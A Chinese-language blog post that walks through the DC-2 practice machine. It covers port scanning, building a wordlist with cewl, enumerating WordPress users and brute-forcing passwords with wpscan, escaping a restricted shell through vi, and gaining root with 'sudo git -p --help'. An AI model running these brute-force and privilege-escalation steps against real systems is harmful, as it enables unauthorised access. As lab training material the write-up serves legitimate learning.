<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT" />










<meta name="description" content="涉及到的知识点： 1 hosts文件 2 cewl生成密码字典 3 wpscan 4 nikto 5 git提权 6 su 7 sudo -l 8  0x00 信息收集主机发现、端口探测、目录扫描三连   得到ip 172.20.10.9 使用命令扫描全端口  nmap -p- 172.20.10.9  发现开放了80 与7744端口。   尝试访问80端口。 此处的7744端口无法判断开启了什么">
<meta property="og:type" content="article">
<meta property="og:title" content="20200428DC-2靶机渗透记录">
<meta property="og:url" content="https://marslx.github.io/2020/04/28/20200428DC-2%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E8%AE%B0%E5%BD%95/index.html">
<meta property="og:site_name" content="MarsLX BLOG">
<meta property="og:description" content="涉及到的知识点： 1 hosts文件 2 cewl生成密码字典 3 wpscan 4 nikto 5 git提权 6 su 7 sudo -l 8  0x00 信息收集主机发现、端口探测、目录扫描三连   得到ip 172.20.10.9 使用命令扫描全端口  nmap -p- 172.20.10.9  发现开放了80 与7744端口。   尝试访问80端口。 此处的7744端口无法判断开启了什么">
<meta property="og:image" content="https://marslxblog.oss-cn-zhangjiakou.aliyuncs.com/uPic/DC2-001.png">
<meta property="og:image" content="https://marslxblog.oss-cn-zhangjiakou.aliyuncs.com/uPic/DC2-002.png">
<meta property="og:image" content="https://marslxblog.oss-cn-zhangjiakou.aliyuncs.com/uPic/DC2-016.png">
<meta property="og:image" content="https://marslxblog.oss-cn-zhangjiakou.aliyuncs.com/uPic/DC2-008.png">
<meta property="og:image" content="https://marslxblog.oss-cn-zhangjiakou.aliyuncs.com/uPic/DC2-010.png">
<meta property="og:image" content="https://marslxblog.oss-cn-zhangjiakou.aliyuncs.com/uPic/DC2-009.png">
<meta property="og:image" content="https://marslxblog.oss-cn-zhangjiakou.aliyuncs.com/uPic/DC2-003.png">
<meta property="og:image" content="https://marslxblog.oss-cn-zhangjiakou.aliyuncs.com/uPic/DC2-004.png">
<meta property="og:image" content="https://marslxblog.oss-cn-zhangjiakou.aliyuncs.com/uPic/DC2-005.png">
<meta property="og:image" content="https://marslxblog.oss-cn-zhangjiakou.aliyuncs.com/uPic/DC2-006.png">
<meta property="og:image" content="https://marslxblog.oss-cn-zhangjiakou.aliyuncs.com/uPic/DC2-007.png">
<meta property="og:image" content="https://marslxblog.oss-cn-zhangjiakou.aliyuncs.com/uPic/DC2-011.png">
<meta property="og:image" content="https://marslxblog.oss-cn-zhangjiakou.aliyuncs.com/uPic/DC2-012.png">
<meta property="og:image" content="https://marslxblog.oss-cn-zhangjiakou.aliyuncs.com/uPic/DC2-013.png">
<meta property="og:image" content="https://marslxblog.oss-cn-zhangjiakou.aliyuncs.com/uPic/DC2-015.png">
<meta property="og:image" content="https://marslxblog.oss-cn-zhangjiakou.aliyuncs.com/uPic/DC2-017.png">
<meta property="og:image" content="https://marslxblog.oss-cn-zhangjiakou.aliyuncs.com/uPic/DC2-018.png">
<meta property="og:image" content="https://marslxblog.oss-cn-zhangjiakou.aliyuncs.com/uPic/DC2-021.png">
<meta property="og:image" content="https://marslxblog.oss-cn-zhangjiakou.aliyuncs.com/uPic/DC2-019.png">
<meta property="og:image" content="https://marslxblog.oss-cn-zhangjiakou.aliyuncs.com/uPic/DC2-020.png">
<meta property="og:image" content="https://marslxblog.oss-cn-zhangjiakou.aliyuncs.com/uPic/DC2-022.png">
<meta property="og:image" content="https://marslxblog.oss-cn-zhangjiakou.aliyuncs.com/uPic/DC2-023.png">
<meta property="og:image" content="https://marslxblog.oss-cn-zhangjiakou.aliyuncs.com/uPic/DC2-024.png">
<meta property="article:published_time" content="2020-04-28T01:39:16.000Z">
<meta property="article:modified_time" content="2020-04-30T08:13:36.808Z">
<meta property="article:author" content="Mars LX">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://marslxblog.oss-cn-zhangjiakou.aliyuncs.com/uPic/DC2-001.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://marslx.github.io/2020/04/28/20200428DC-2靶机渗透记录/"/>





  <title>20200428DC-2靶机渗透记录 | MarsLX BLOG</title>
  








<meta name="generator" content="Hexo 4.2.0"></head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">MarsLX BLOG</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">献给姣姣</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/%20" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/%20" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://marslx.github.io/2020/04/28/20200428DC-2%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E8%AE%B0%E5%BD%95/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Mars LX">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="MarsLX BLOG">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">20200428DC-2靶机渗透记录</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2020-04-28T09:39:16+08:00">
                2020-04-28
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>涉及到的知识点：</p>
<p>1 hosts文件</p>
<p>2 cewl生成密码字典</p>
<p>3 wpscan</p>
<p>4 nikto</p>
<p>5 git提权</p>
<p>6 su</p>
<p>7 sudo -l</p>
<p>8 </p>
<h3 id="0x00-信息收集"><a href="#0x00-信息收集" class="headerlink" title="0x00 信息收集"></a>0x00 信息收集</h3><p>主机发现、端口探测、目录扫描三连</p>
<img src="https://marslxblog.oss-cn-zhangjiakou.aliyuncs.com/uPic/DC2-001.png" style="zoom: 50%;" />

<p>得到ip 172.20.10.9</p>
<p>使用命令扫描全端口</p>
<blockquote>
<p>nmap -p- 172.20.10.9</p>
</blockquote>
<p>发现开放了80 与7744端口。</p>
<img src="https://marslxblog.oss-cn-zhangjiakou.aliyuncs.com/uPic/DC2-002.png" style="zoom: 50%;" />

<p>尝试访问80端口。</p>
<p>此处的7744端口无法判断开启了什么服务，使用命令详细扫描下。</p>
<blockquote>
<p>nmap 172.20.10.9 -A -p-</p>
</blockquote>
<p><img src="https://marslxblog.oss-cn-zhangjiakou.aliyuncs.com/uPic/DC2-016.png" alt=""></p>
<p>发现7744是ssh服务。</p>
<p>其他信息收集，使用wappalyzer (chrome的插件)</p>
<img src="https://marslxblog.oss-cn-zhangjiakou.aliyuncs.com/uPic/DC2-008.png" style="zoom: 67%;" />

<p>使用目录扫描dirb，可以得到一些关于wordpress的目录地址（截图未截全）。</p>
<img src="https://marslxblog.oss-cn-zhangjiakou.aliyuncs.com/uPic/DC2-010.png" style="zoom:50%;" />

<p>使用nikto <a href="https://www.cnblogs.com/xtznb/p/10569574.html" target="_blank" rel="noopener">使用参考</a></p>
<blockquote>
<p>nikto -h <a href="http://dc-2" target="_blank" rel="noopener">http://dc-2</a></p>
</blockquote>
<p><img src="https://marslxblog.oss-cn-zhangjiakou.aliyuncs.com/uPic/DC2-009.png" alt=""></p>
<h3 id="0x01-hosts"><a href="#0x01-hosts" class="headerlink" title="0x01 hosts"></a>0x01 hosts</h3><p>访问80，发现会自动跳转到dc-2。</p>
<img src="https://marslxblog.oss-cn-zhangjiakou.aliyuncs.com/uPic/DC2-003.png" style="zoom: 50%;" />

<p>使用命令进行全端口详细扫描</p>
<blockquote>
<p>nmap -A -p- 172.20.10.9</p>
</blockquote>
<p>得到结果</p>
<p><img src="https://marslxblog.oss-cn-zhangjiakou.aliyuncs.com/uPic/DC2-004.png" alt=""></p>
<p>得到提示，<a href="http://172.20.10.9地址被重定向到了http://dc-2，此时，如果想要成功访问http://172.20.10.9的内容，需要有dns服务器记录两者的映射，此处当然不存在这样的dns服务器，但是可以通过修改hosts文件的方法来实现这样的结果：跳转到http://dc-2时，再次映射为172.20.10.9。" target="_blank" rel="noopener">http://172.20.10.9地址被重定向到了http://dc-2，此时，如果想要成功访问http://172.20.10.9的内容，需要有dns服务器记录两者的映射，此处当然不存在这样的dns服务器，但是可以通过修改hosts文件的方法来实现这样的结果：跳转到http://dc-2时，再次映射为172.20.10.9。</a></p>
<p>hosts文件的具体位置：</p>
<ul>
<li>windows：C:\Windows\System32\drivers\etc</li>
<li>linux：/etc/hosts</li>
</ul>
<p>linux下测试时，必须使用root用户才能修改。</p>
<p><img src="https://marslxblog.oss-cn-zhangjiakou.aliyuncs.com/uPic/DC2-005.png" alt=""></p>
<p>访问页面得到第一个flag与提示cewl。</p>
<p><img src="https://marslxblog.oss-cn-zhangjiakou.aliyuncs.com/uPic/DC2-006.png" alt=""></p>
<h3 id="0x02-密码密码"><a href="#0x02-密码密码" class="headerlink" title="0x02 密码密码"></a>0x02 密码密码</h3><p>经搜索学习，得知cewl的作用是，根据指定的目标网址，自动生成密码字典。</p>
<p><a href="https://www.freebuf.com/articles/network/190128.html" target="_blank" rel="noopener">cewl使用参考</a></p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">cewl http://dc<span class="literal">-2</span></span><br><span class="line">注意：</span><br><span class="line"><span class="number">1</span>.这里是ssh连接kali虚拟机后执行的该命令，所以也需要修改kali中的/etc/hosts文件，添加对dc<span class="literal">-2</span>的映射才能正常解析。</span><br><span class="line"><span class="number">2</span>.测试cewl http://<span class="number">172.20</span>.<span class="number">10.9</span> 无法得到想要的结果</span><br><span class="line"></span><br><span class="line">将生成的字典输出到指定文件中</span><br><span class="line">cewl <span class="literal">-w</span> password.txt http://dc<span class="literal">-2</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">####拓展</span></span><br><span class="line"><span class="literal">-m</span> 参数可以指定生成密码的长度</span><br><span class="line">cewl http://dc<span class="literal">-2</span> <span class="literal">-m</span> <span class="number">9</span>     <span class="comment">#生成长度为9的密码</span></span><br><span class="line"></span><br><span class="line"><span class="literal">-e</span> email参数，<span class="literal">-n</span> 隐藏工具在爬取网站中生成的密码字典</span><br><span class="line">cewl http://dc<span class="literal">-2</span> <span class="literal">-e</span> <span class="literal">-n</span> 		<span class="comment">#测试抓该网站没有结果</span></span><br><span class="line"></span><br><span class="line"><span class="literal">-c</span> 统计单词出现的次数</span><br><span class="line">cewl http://dc<span class="literal">-2</span> <span class="literal">-c</span></span><br><span class="line"></span><br><span class="line"><span class="literal">-d</span> 增加爬取的深度 默认为<span class="number">2</span></span><br><span class="line">cewl http://dc<span class="literal">-2</span> <span class="literal">-d</span> <span class="number">3</span>			<span class="comment">#会生成更庞大的字典</span></span><br></pre></td></tr></table></figure>



<img src="https://marslxblog.oss-cn-zhangjiakou.aliyuncs.com/uPic/DC2-007.png" style="zoom:33%;" />

<p>得到了密码字典，但是不知道在哪里使用。多处显示网站使用wordpress进行开发，猜测密码用来登录后台管理。但是当前不知道用户名。</p>
<p>经过研究学习，可以使用wpscan来进行进一步信息收集。</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">wpscan用法</span><br><span class="line"></span><br><span class="line">wpscan -<span class="literal">-url</span> http://dc<span class="literal">-2</span> -<span class="literal">-enumerate</span> u <span class="comment">#猜测可能的用户名</span></span><br><span class="line"></span><br><span class="line">wpscan -<span class="literal">-url</span> http://dc<span class="literal">-2</span> <span class="literal">-e</span> u <span class="literal">-P</span> ./test.txt <span class="comment">#test.txt是刚才使用cewl生成的密码字典</span></span><br></pre></td></tr></table></figure>

<blockquote>
<p>wpscan –url <a href="http://dc-2" target="_blank" rel="noopener">http://dc-2</a> –enumerate u</p>
</blockquote>
<p>猜测用户名结果：</p>
<p><img src="https://marslxblog.oss-cn-zhangjiakou.aliyuncs.com/uPic/DC2-011.png" alt=""></p>
<blockquote>
<p>wpscan –url <a href="http://dc-2" target="_blank" rel="noopener">http://dc-2</a> -e u -P ./test.txt</p>
</blockquote>
<p>暴力破解出账号密码</p>
<p><img src="https://marslxblog.oss-cn-zhangjiakou.aliyuncs.com/uPic/DC2-012.png" alt=""></p>
<p>尝试登录。</p>
<p><img src="https://marslxblog.oss-cn-zhangjiakou.aliyuncs.com/uPic/DC2-013.png" alt=""></p>
<p>使用jerry用户登录的时候，这里的7pages才可以访问。</p>
<p><img src="https://marslxblog.oss-cn-zhangjiakou.aliyuncs.com/uPic/DC2-015.png" alt=""></p>
<p>得到flag2。这里提示another entry point，尝试使用7744端口的ssh服务？</p>
<h3 id="0x03-ssh"><a href="#0x03-ssh" class="headerlink" title="0x03 ssh"></a>0x03 ssh</h3><p>那啥，看了提示，使用上面爆破出来的账号密码连接ssh。</p>
<p>注意命令中需要指定端口为7744。</p>
<blockquote>
<p>ssh <a href="mailto:tom@172.20.10.9">tom@172.20.10.9</a> -p 7744</p>
</blockquote>
<p>测试两个账号，tom可以成功访问。</p>
<img src="https://marslxblog.oss-cn-zhangjiakou.aliyuncs.com/uPic/DC2-017.png" style="zoom:50%;" />

<p>得到flag3与提示。</p>
<p><img src="https://marslxblog.oss-cn-zhangjiakou.aliyuncs.com/uPic/DC2-018.png" alt=""></p>
<h3 id="0x04"><a href="#0x04" class="headerlink" title="0x04"></a>0x04</h3><p>tom账号连接的ssh，发现默认登陆bash为rbash。0x03中使用vi查看flat3.txt，所以想到尝试使用vi进行提权。</p>
<p>之后切换到jerry账户后使用cat /etc/passwd，也证实了这一点。</p>
<p><img src="https://marslxblog.oss-cn-zhangjiakou.aliyuncs.com/uPic/DC2-021.png" alt=""></p>
<p>vi提权的方法</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">vi  <span class="comment">#进入vi</span></span><br><span class="line"></span><br><span class="line">:set shell=/bin/bash</span><br><span class="line">:shell</span><br></pre></td></tr></table></figure>

<img src="https://marslxblog.oss-cn-zhangjiakou.aliyuncs.com/uPic/DC2-019.png" style="zoom:50%;" />

<p>得到flag4</p>
<img src="https://marslxblog.oss-cn-zhangjiakou.aliyuncs.com/uPic/DC2-020.png" style="zoom:50%;" />

<h3 id="0x05-git提权"><a href="#0x05-git提权" class="headerlink" title="0x05 git提权"></a>0x05 git提权</h3><p>使用sudo jerry切换用户，输入密码后切换成功。</p>
<p>补充：这里cat /etc/ssh/sshd_config有如下配置</p>
<img src="https://marslxblog.oss-cn-zhangjiakou.aliyuncs.com/uPic/DC2-022.png" style="zoom:50%;" />

<p>说明只允许tom用户连接到本机的ssh，所以当使用tom登陆进来后，才想到尝试使用su切换到jerry用户进行进一步搜索。</p>
<p>Flag4 中的提示 git outta here</p>
<p>经过搜索学习了解到git可以进行提权</p>
<p>判断是否可以使用git提权</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">关于sudo命令</span><br><span class="line">使用sudo执行的命令，可以像拥有root权限一样</span><br></pre></td></tr></table></figure>



<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo <span class="literal">-l</span> 	<span class="comment">#显示当前用户可以执行哪些命令，</span></span><br></pre></td></tr></table></figure>

<p><img src="https://marslxblog.oss-cn-zhangjiakou.aliyuncs.com/uPic/DC2-023.png" alt=""></p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">sudo git <span class="literal">-p</span> -<span class="literal">-help</span></span><br><span class="line">注意:一定要使用sudo来执行git</span><br></pre></td></tr></table></figure>

<p>成功获得root权限。</p>
<p>cd /root</p>
<p>cat final-flag.txt</p>
<img src="https://marslxblog.oss-cn-zhangjiakou.aliyuncs.com/uPic/DC2-024.png"  />




      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/04/26/%E5%91%BD%E4%BB%A4%E8%AE%B0%E5%BD%95%E6%8C%81%E7%BB%AD%E6%9B%B4%E6%96%B0/" rel="next" title="命令记录持续更新">
                <i class="fa fa-chevron-left"></i> 命令记录持续更新
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2020/04/28/20200428suid%E6%8F%90%E6%9D%83/" rel="prev" title="20200428suid提权">
                20200428suid提权 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Mars LX</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/%20%7C%7C%20archive">
              
                  <span class="site-state-item-count">6</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#0x00-信息收集"><span class="nav-number">1.</span> <span class="nav-text">0x00 信息收集</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x01-hosts"><span class="nav-number">2.</span> <span class="nav-text">0x01 hosts</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x02-密码密码"><span class="nav-number">3.</span> <span class="nav-text">0x02 密码密码</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x03-ssh"><span class="nav-number">4.</span> <span class="nav-text">0x03 ssh</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x04"><span class="nav-number">5.</span> <span class="nav-text">0x04</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x05-git提权"><span class="nav-number">6.</span> <span class="nav-text">0x05 git提权</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Mars LX</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
